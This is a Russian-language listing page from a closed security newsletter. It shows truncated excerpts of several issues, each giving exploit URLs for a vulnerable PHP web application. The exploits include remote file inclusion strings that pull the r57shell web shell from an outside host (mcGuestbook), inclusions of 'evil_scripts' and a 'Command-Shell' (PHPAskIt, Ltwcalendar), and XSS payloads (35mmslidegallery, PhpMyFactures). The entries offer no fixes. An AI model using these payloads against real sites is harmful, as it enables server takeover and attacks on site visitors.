Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в mcGuestbook.
Компьютер для продвинутых пользователей В этом выпуске: mcGuestbook ПО: mcGuestbook Версия: 1.3 Уязвимость: Возможность дистанционного выполнения удаленного кода с вашего вэб-сервера. Использование: http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt? Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PhpMyFactures.
Компьютер для продвинутых пользователей В этом выпуске: PhpMyFactures ПО: PhpMyFactures Версия: 1.0 Использование: [Guest] http://]/inc/header.php?prefixe_dossier[XSS] [Admin] http://]/remises/ajouter_remise.php?msg[XSS] [Admin] http://]/remises/ajouter_remise.php?tire[XSS] [Admin] http://]/tva/ajouter_tva.php?msg[XSS] [Admin] http://]/stocks/ajouter.php?id_produit=1...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPAskIt.
Компьютер для продвинутых пользователей В этом выпуске: PHPAskIt ПО: PHPAskIt Версия: 2.0.1 Уязвимость: Уязвимость позволяет выполнить код на сервере. Использование: http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir[evil_scripts] http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir[evil_scripts] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в 35mmslidegallery.
Компьютер для продвинутых пользователей В этом выпуске: 35mmslidegallery ПО: 35mmslidegallery Версия: 6 Уязвимость: В данном приложении некоторые переменные не проверяются до выполнения. Это позволяет нам вставить любой JavaScript-код и провести XSS-атаку. Использование: http://example.com/lumet/album/index.php?imgdir><script>alert'10)</script> http://example.comr/lumet/album/popup.php?w><script>alert'10)</script> http://example.com/lumet/album/popup.php?h><script>alert'10)</script> http:...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Ltwcalendar.
Компьютер для продвинутых пользователей В этом выпуске: Ltwcalendar ПО: Ltwcalendar Версия: 4.1.3 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: require_once./private/ltw_config.php); require_once$ltw_config'include_dir'/ltw_classes.php); Использование: http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно н...
